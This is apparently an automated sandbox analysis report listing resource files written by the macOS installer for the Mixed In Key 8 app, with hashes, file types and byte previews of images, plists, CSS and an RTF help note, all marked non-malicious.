                                                                                                    Preview: /*..CSS for Mixed In Key top theme..Copyright 2008 - 2014 Mixed In Key LLC.. */..html {..height:70px;.}.body {..height:70px;..margin:0;..padding:0;..font:14px "Roboto";..background-color:rgb(0, 32, 78);..overflow:hidden;.}.#logo-left {..height:63px;..margin:0;..background:url("../images/mik-top-left.tiff") 15px 11px no-repeat;..background-size: 138px 52px;.}./*#logo-right {..position:absolute; right:0; top:0;..height:88px;..width:459px;..margin-right:20px;..background:url("../images/mik-top-right.tiff") no-repeat;..background-size: 459px 88px;.}.*/./* simulated tabs */./*#menu {..position:absolute;..top:24px;..left:262px;..height:40px;..background:url("../images/top-menutheme.png") repeat-x;..border-left:1px solid #c8c8c8;.}.a.tab {..display:table-cell;..margin:0;..padding:13px 15px 12px 15px;..border-left:1px solid transparent;..border-right:1px solid #c8c8c8;..text-align:center;..text-decoration:none;..color:rgb(120, 120, 120);.}.a.tab:hover {..background:url("../images/top-tab-hover
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_6NNHFB
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 180 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):64028
                                                                                                    Entropy (8bit):4.58202406646576
                                                                                                    Encrypted:false
                                                                                                    MD5:A019EE1FBBF60977761F6F4B79C2BCBB
                                                                                                    SHA1:E84CB73B4408DBE78DA97636248615F960E0CB8F
                                                                                                    SHA-256:C1995A641D32BA154AE438480B985C8D6129BFDB0B038DD5B13889045F0151A4
                                                                                                    SHA-512:C563883DA83637B091D3E10766189D11A179A07D7265A09EA92F2A066C7B5CB1CD9C99D7B03EB34375D563ECF311D0CC9AC7A988E819918E41524EC15172BA74
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......2......$......pHYs...%...%.IR$....OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_7W36ME
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 146 x 150, 8-bit colormap, non-interlaced
                                                                                                    Size (bytes):10419
                                                                                                    Entropy (8bit):7.972878199886934
                                                                                                    Encrypted:false
                                                                                                    MD5:024BC5E07D0FD27565BDD69BFF536ACA
                                                                                                    SHA1:D3F8CE77BB32DEB533C16B29114E39B0B97124C1
                                                                                                    SHA-256:BFD5389E9936485AC6FBEC9190D2ADC110CDB4A2B04BC16EB8A547BAE1E1924F
                                                                                                    SHA-512:CC1EC72497B463FA43C934A88D5FE69E55D7CF357DB9417902742355DAF619ECEFC91A9D1AEA868E674FFE2E5EDCA4226CA0B1DCC0712F2E87D4E7CDE3F3DE8A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR..............4!.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...,PLTE.............................................................................................................................................................................................................................................................................................................9.u..'.IDATx.L|.c.<.,...)..,+9.=9.3....vo....w/....^WU...c[.D"t...F.!....BN......>....k.R.x.XJ.%616x..bi...=.-)...v.>.C...~.l.....4.BC.9L...1.....j..o..P..g..x...k..16.l..=......7.o......r.|.....d................}0g.?....9...=...........`...:...Rt.../<[-.,.0v,.-...s..~.C.m.......Y.....M`HZ}{.d..3W..3p.6.w.:.k,E.X+.N|....N;.U...b.X..Yp.x.......V.{b%....Ke..>N.....-.(.../.9...V.^......A..-...i......]{..X.....o6.l...}H.`..VfM.Mc..I.?..^"...........5...b..Z......^...m ....E..1..c.Uy).k.pI.....<...8V4.H. .x_...V.>V...........<%\..C.;.b_. ..>.t..ECA..}..k.....|.)&o.n.^.>............8..`.....? ..@..[..B6a
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_BDPiJT
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Rich Text Format data, version 1, ANSI
                                                                                                    Size (bytes):964
                                                                                                    Entropy (8bit):5.073251527930704
                                                                                                    Encrypted:false
                                                                                                    MD5:FEF06E9513BD8CF8CE360E79BA771F6A
                                                                                                    SHA1:D429E3F159CE9ADDA733794D37B63FEE820525D9
                                                                                                    SHA-256:6C540CFA9C2E9C4342579ECB59B72B011B37F4588FEB016B725767371E09F54C
                                                                                                    SHA-512:AE5853D5169C256A2DC16E3163210CDDFD8B3140FCDF8A0BC379BD944A835550B1723CC368DEED17FCACD0FA2CC0FF79D8B27C9A71248D3D4287A3FAD5C1B903
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: {\rtf1\ansi\ansicpg1252\cocoartf1561\cocoasubrtf600.{\fonttbl\f0\fnil\fcharset0 Roboto-Regular;\f1\fnil\fcharset0 Roboto-Medium;}.{\colortbl;\red255\green255\blue255;\red0\green32\blue78;}.{\*\expandedcolortbl;;\csgenericrgb\c0\c12549\c30588;}.\paperw11900\paperh16840\margl1440\margr1440\vieww19200\viewh15760\viewkind0.\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0..\f0\fs28 \cf2 Users of .\f1 Ableton Live.\f0 , .\f1 Traktor.\f0 , and other DJ programs should be careful when using File Renaming. Many DJ programs may store cue points and other metadata based on the original file name. When renamed, music files can lose this information and may even have to be reimported into your DJ software.\.\.If you use .\f1 iTunes.\f0 , you must disable the 'Keep iTunes Media Folder Organized' option in iTunes' advanced preferences. File renaming will not work until you change this setting.}
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_CG2FAR
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):43612
                                                                                                    Entropy (8bit):7.686593151643444
                                                                                                    Encrypted:false
                                                                                                    MD5:90BE9B3CDB26E7911F80D71718F3245F
                                                                                                    SHA1:A0232E3978B9478316533A0FA46C631ACEC222EF
                                                                                                    SHA-256:F949FA512A0A2EF1B81A080977EBF6453EDCD59048F5EF2E2ABBBAE346AEAF81
                                                                                                    SHA-512:B54E57081CC0A2F6AB58A96D05926CC03D0F6428CAA2014ACCB57236A310F87ED797699A2E05DD546E6D656EB8FB07EBC3F541228B1D579D86E75F2E4AB31446
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*..]2.. P8$....BaP.d6...DbQ8P....;............`.....@`@..N...@@......?.o(...?{._......... P.)..@._.J.V.W.VkU..v._.XlV;%..g.ZmV.e..o...,.+...&...y8.T........(....2. .L......L..#.I....^.#.?........>.`'...:}?./.....z9..GS3f.e....Px...T...g7...tz]>.W...v{Gv`<&.....0Y)....@ `@FL.....-x.9...>..._.....d.....~......I.>..p[/.$pp.|5...{(..8.....y....z.......X.....&%5..m....u....}.... ....@........ .........; ..`....mx..@.\%..2....s...Jg...A.....pl....,........'.8..)..u....s.Lq.Y6`!dt..Q.!S..5M...=O.........}.$.............>.\............KpK..X*(..@...e.....B.]..N.(.: .e.; S...$g.......o....X.l!83..Yv@...E{....}......... G....A..\WU..+.....Y..._Y.f5db/.;[3.....2..]....i.v...$s...[h-.8.g.J.\U..K..i.q....M. @.L.$..u_..........W....bh...C...I....b..ib....eX..j......ds.e.?.......[..V...A.&j..S....s..:g.<.<.o.N.....}....}.......V....o]....e.....3.G....;\....}...=........NO..3...A...T.^O.M...y.k=...w...._.[.._.}(.6.....t.W.......u..y......P..@R..C.....~..<?JH#..4.<Uj..bh.i...f.........1....b....1+.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_CU4Toi
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):5172
                                                                                                    Entropy (8bit):6.558977550874714
                                                                                                    Encrypted:false
                                                                                                    MD5:6A13C7C2BC1565C63B370711F55DBE1F
                                                                                                    SHA1:DD2BB386E50C6B2A7DAACCA9B1DF5BADB4FE66ED
                                                                                                    SHA-256:9DF4BBB5FB6CEC99D6D5E782420723FBE25D82CC95427B0E7C81F0D66E5F6CD0
                                                                                                    SHA-512:A47DB77001AC861249429A342734C8ACAEB33453EA46C5C2C81582A7D3521382563CC1487BF1828CC5535394B5D4B49A862F6D3A0734A80A9C24722D41AD5D33
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top.......q.......#.$.*...2.=.E.T.U.V.`.p.q.r.............................................................................).*.4.5.6.:.;.<.@.E.F.J.O.P.U.V.[.\.a.b.g.h.m.n....................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....T.R.N.o...o.n.p.S.. ...!."[NSClassName...._.(_TtC10MixedInKey22TutorialViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...?.B.D.F.H.J.L.;..>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....=.>..F... .G.H.I.J.K.L.M.N.O.P.Q.P.S_..NSOriginalClassNameZNSSubviews_..NSNextResponderXNSvFlags]NSNibTouchBar[NSFrameSize................<_.._TtC10MixedInKey12TutorialV
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_CXKvs5
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 36 x 36, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):622
                                                                                                    Entropy (8bit):7.404463141396479
                                                                                                    Encrypted:false
                                                                                                    MD5:BBDC220AEA5CAD4E2FF300D0E519B088
                                                                                                    SHA1:4FFB02B3788FED06697141332B78132108276A5C
                                                                                                    SHA-256:8C61AF9BC4290727DC65B052B3149F10392B2A202C3B9B33F9937EF4945FB228
                                                                                                    SHA-512:03710D41B9056FA6FBFEB0A8756F9470A32959CAA80A9DA10C2C9C8C833AD5128570E30FF2F9F1EE830A0A5C2BDB7A746C985ED85910EC08925BABC4A5E3B3B6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...$...$.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx....m.0.@M....L@:....t.`.....(.....H' ..L..P[.T.u...+H=........h>...I....".+........I"........-.c$...z...W......`.....F..J.d!..1...r.1....W.#..%..<;k....k_....`..........9c..........C..........g..%..F5a..].B...P.W.....cBW....e#.H ........D.q@K....#.......mY......$.}."..v...S?Dx.......%":....>@.25...#@.m@.R.!.......J..P.s..?@X..t]A..$..*..rb.......G.*.#........]..)b.&....a....m...C..#......s..%,.s..%.m-..u)R%...j(t...kk..~...H(.E.l..=.-.J../b.....'H..e.P#..6...=%fS....}./......m.1........0R:..<..+.....jh ..x.P.JY;R.#../....e,.....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_CnbbvG
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):3684
                                                                                                    Entropy (8bit):6.300788864070002
                                                                                                    Encrypted:false
                                                                                                    MD5:C937A122639DDEB8C31A600525E7549F
                                                                                                    SHA1:BCF342C417F491F0EECBC97026DDCCE71987463E
                                                                                                    SHA-256:B2B001C66BC824D1A4717D45C4DE362E1729398E0105FADB0BEE82B4192A8E2E
                                                                                                    SHA-512:01BED1029D47BC67CBBAACFE610C0096CB7AAC939FB973188B6794191E5DA61970761C17FC296F0B43BC4110B17755BB905169857130EDC4D9C63B7B218976FF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............2.3X$versionX$objectsY$archiverT$top.......8.......#.$.*...2.7.?.n.z.{.............................................................$.%.`.......&.'.(.b.).,./U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....*.(.%.6...6.5.7.).. ...!."[NSClassName...._.,_TtC10MixedInKey26RadioButtonsViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.6..4.5........8.9.:.....<.=.>XNSSource]NSDestinationWNSLabel............@.A.B.C.D.E.F.G.H.I.J...K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.b.].d.e.^.].g.^.h.Y.i._.^.k.l.m.`_.%NSStackViewVerticalClippingResistance[NSFrameSize_..NSStackViewDetachesHiddenViewsXNSvFlags_..NSStackViewHasEqualSpacing_..NSStackViewEdgeInsets.left_..NSNextResponder_..NSStackViewSecondary
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_DAaVeA
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 180 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):64028
                                                                                                    Entropy (8bit):4.507098925086711
                                                                                                    Encrypted:false
                                                                                                    MD5:86FD6051E68615A7B52481DE3AC21E27
                                                                                                    SHA1:4F266E381F57F22255ED29A17C6F121C9B8E2566
                                                                                                    SHA-256:4DF57EA5C4ADB0204C8D05FCD5239C27CDE5F3AB6A8840AC80461176924AEFBC
                                                                                                    SHA-512:BD75BC6C41438D1302824F1B06E3F7F6793B0927949A206D727994B9F28324F8D2F0B0331F09A62698C83001B98C9E0C4C6FD19CE230073DB8D217DCEAD61AAB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......2......$......pHYs...%...%.IR$....OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_DEg6F1
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 36 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):467
                                                                                                    Entropy (8bit):7.235944718437383
                                                                                                    Encrypted:false
                                                                                                    MD5:EB4700EF433EE10C93AF199A79EC04A3
                                                                                                    SHA1:6D63C4F6A151DEAB58263A21DAB49E59A9CBEFE6
                                                                                                    SHA-256:1A3DDF0E0FF89A465CBEBA1C0A95B76E91CC097872E9B381365BB8639EC070D7
                                                                                                    SHA-512:BC56E7BD9C057068F049BBC914931C4B0AA9F02DA46C8A27AA5F9B51DD64E4E3BC3BCDD38F45A14FFE127E28171D15A399CEC79F9D3DCC8E2F5AE71AA2324037
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...$... .....z.......tEXtSoftware.Adobe ImageReadyq.e<...uIDATx.btqqa ....D .D.{..;.x*..'.P&2.X..V ^.......h >......T.Y.p.Q"..BC...!.E.zSh...A.dDq.....@e.9.....`s.;2..GK..%.A.i. .2.d=.B..i..`s.N2..AK....7$..JK..*V/......Z..g../.j...=...O....jO..A.@....t.B.l...c........).....P'...F@.+...T.......Xb....h......R..%...$..c$..K.fl%Tl0.H'y........@...u.?.GU.9....C.O.vih.....y..4..t...q...Z..m&P.....k..1.].~....Q.... .A. !..D.r7h.9. ..aT<5v.[.....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_ExJF3I
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):45871
                                                                                                    Entropy (8bit):7.025618848131701
                                                                                                    Encrypted:false
                                                                                                    MD5:2223B108B19AB9E2D192ED6BE25AA0FC
                                                                                                    SHA1:A8544B69D36A9975EAA0ED859EC00B661A4C47D2
                                                                                                    SHA-256:B98B8BCB6B6A6FE964C603ECB61DE3892FD9BCEF210AFBDB7189CF6AF7A51723
                                                                                                    SHA-512:577492821A6F2B71AA007E4170434EFF1678F99553A59D947B3613131F8B75D9211AEA27AAF30906F9FEB1118BE90A634AC27AA12BAC0DBFF1DD1D6F903E8A3C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.}..................................................................... .!.&.+.1.M.N.O.P.X.Y.\.f.g.k.p.q.u.v.z.........................................................................................+.,./.0.;.<.@.A.E.H.L.Q._.`.c.d.n.o.p.t.w.{...............................................................".'.(.).-.2.?.C.D.G.J.K.P.V.W.\.z.{.|.....................................................................".'.(.)...4.9.F.G.K.L.P.Q.T.[.\._.`.e.n.x.........................................................................!.".%.G.r.s.t.u.v.w.x.y.z.{.|.}.~.................................................................................................#.$.+.,./.2.3.F.K.Q.W.\.a.f.k.p.v.{...................................................................'.(.0.1.4.?.@.K.N.O.R.^._.c.h.q.r.u...................................................................3.8.=.B.H.M.R.X.^.c.i.n.s.x.}.............................
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_FNJ4JZ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):137032
                                                                                                    Entropy (8bit):6.683424609062979
                                                                                                    Encrypted:false
                                                                                                    MD5:FD4F698B9FF77DC14DFA6B2632800040
                                                                                                    SHA1:B6EAB3965B277E3292BEAA146400B91BE51BCB38
                                                                                                    SHA-256:B138F3188B5478D18BD1B1CD55882AC9948D4E3A79E183F1C84B2DB9B7817DEB
                                                                                                    SHA-512:5A97CCC0BA562BB9D3F484C6446F80637C9E3094A41BA82F9AD6B1C4514E18BE07F3AE064A8EC142EF11C94A8021FD121FCE244AD78F3C30373798DF36DB016E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top........+.......#.$.*...2.h.p................................................................................. .!.).,.-...2.7.E.F.G.K.L.O.P.U.............................................".#.$.+.3.7.;.?.E.M.N.S.X.Y.^.c.d.f.i.r.s.y.z.}.............................................................................&.'.-...1.8.=.>.I.J.P.Q.T.[.`.a.b.l.m.s.t.w.~...................................................................................$.).*.3.4.:.;.>.E.J.K.P.Q...V.W.|.}............................................................... .).*.../.4.5.:.C.D.H.I.J.R.V.W.X.[._.`.s.t.u.x............................................................................................... .$.%.&.+.3.4.8.D.E.F.M.P.Q.V.^._.c.o.p.q.x.{.|.................................................................m...............u.............#.%...2.3.4.8.;.<.A.I.J.N.Z.[.\.c.f.g.l.t.u.y.........................................................5...-.../.0.3.7.<.?.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_FUVJIv
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):976
                                                                                                    Entropy (8bit):5.105485741649838
                                                                                                    Encrypted:false
                                                                                                    MD5:92BFCE18DDF9194FE31CD0664C2A82CD
                                                                                                    SHA1:BEC40D7A055D513762F1ACAD41BC8FC8C77A7A6C
                                                                                                    SHA-256:B69C7819208EF063A20FD071C45021A0F7CB51F2ED24E87479AFE8B50D40B1C7
                                                                                                    SHA-512:DE92D782C3DD6E9647697AB47F632E26E3E9B9B85EE7B47978D2636B9F62EBAE135E1AEA17C978CE8548762DC6AE3BA75B5612EF224D7A0154E17D24B0279B34
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>tableHeaderBackgroundImage</key>..<string>header-background.png</string>..<key>name</key>..<string>Default</string>..<key>version</key>..<integer>0</integer>..<key>mainThemeImage</key>..<string>main-theme.png</string>..<key>analysisMessageImage</key>..<string>analysis-message.tiff</string>..<key>topURL</key>..<string>html/top.html</string>..<key>labelColor</key>..<string>102 120 102</string>..<key>tableColor</key>..<string></string>..<key>tableHighLightColor</key>..<string>25 203 255</string>..<key>tableHighLightBackgroundImage</key>..<string>row-background.png</string>..<key>tableHighLightNoFocusBackgroundImage</key>..<string>row-background-nofocus.png</string>..<key>tableHighLightNoFocusColor</key>..<string></string>..<key>tableLinkColor</key>..<string>0 0 255</string>.</dict>.</plist>.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_G9dbYc
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):10776
                                                                                                    Entropy (8bit):7.06896799185437
                                                                                                    Encrypted:false
                                                                                                    MD5:6F5B61B5B416863B675C5EEAE426B12E
                                                                                                    SHA1:2030B695EB08050137E49980B5F2DAA96D32E3CF
                                                                                                    SHA-256:092F029353739A97ACCDCEAA75C426A214BB765CAA436DB30C6D4082D6D52B45
                                                                                                    SHA-512:67F7786B1A3B21E9A093086DBE133262456EA8AFE25B304681B911F5CD7378D35344628266680D5F0EE9BB96F55024F5637BCE2D309C6DA2DC392A7BEF11E37C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*...F.............>.......................,...........,....2016:07:27 02:43:49..?.@.$....BaP.d6...DbQ8......cQ..v=....l..~>...`.8(..$.. .(K..... .H+6....d..(.S....rZ.FU.&AI.Q.6(... .I.Z.E...0Z]z.,.....(b.^tAT.U,..`.@.RJ...h........@.O...$..8.L...$..h.S....F.... .....z._#..)..q.....%j.X....J.BS.G.Q.W,gM..A,.\..../.q@.......c6.%..+..`.I.K....9q.d.......(&....v..L..../.C...n".......!...............0.....r.....:..PD..A.X.....Z..H|...`j.. .*.. .:_......B.r.5 ..J.//...!..:..2R.$4.b.......Gr..0 ....$.2....Z.........K....z...O.Lt...4..Hc..Jl....H4.'E..2...j.F...MHPh............G.QK...HKeS;..9... ....M>.;..*.3H1...uB.k...|.!0*.a.5.....j.q....n....s....T.H.Z.!-..!,...;$...[.6....K5ge....i[.)......~!...T\..we .J.$....H)vp..!...A.bj..aH&..Wh...!#..U..I.......9..f)..&....... .B..f69....N......Y..)[.d..;.:.I....>0.\.%z.l(!..!"..Vk....e(...iu....Y.....F.X.HNJ..[......{........>.[!<..R?5....<?..$.z..(.......... ........#......F...&.y. .~...K.L...b...`...k..h.k.7cw.....g.0...((:..H*.......E.%..y....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_GEMTGS
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 44 x 44, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):447
                                                                                                    Entropy (8bit):7.316707006483209
                                                                                                    Encrypted:false
                                                                                                    MD5:2DD935B011D02BCB06B68E3AE41D6551
                                                                                                    SHA1:0D110A67331FD07233808D7605A0A765751F4561
                                                                                                    SHA-256:5E0977973DC355274F89298416E19A61C93E563A596CCC82D7B62D58EEC8FD21
                                                                                                    SHA-512:93AFE8A63EDE4A8242D2D991FA20E28FEACF74F9073F0BB80BA6BA00F01ABBB7019A2DE6C6F2FA3EF96A33CD3E4D94BE2CD9C8ED1783D8461CA4DFA96271A794
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...,...,.......Z.....tEXtSoftware.Adobe ImageReadyq.e<...aIDATx...1n.0.E.y..E.N...wiF.!=Q.\... ..6@..H.......>..p1,..&i.p^....$..\k..h)..Y.....@..?.D.y.x{..M...........bU=b....{;Y.<..lJg.D..~*./..p..}....:...X..k..b..G.....8...f?4.^..!h.0S.5.l.....k.^.-.IA.Z.....4$...1S.]E.X.tU..X..k..z...-.1d..X.........Z..9.f..\...V.....&....8..x....V....V....Vs...V{D...0....a}J...J..3..p.{K.%..5.....;s..U..|..........]...s.T....+....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_HQEDji
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 40 x 76, 8-bit/color RGB, non-interlaced
                                                                                                    Size (bytes):4293
                                                                                                    Entropy (8bit):7.789638893526219
                                                                                                    Encrypted:false
                                                                                                    MD5:DEB2446FBBF5FA708348D76A2AB2D541
                                                                                                    SHA1:26FC3F0E7F0603A5C0663A525C8BD75C39765262
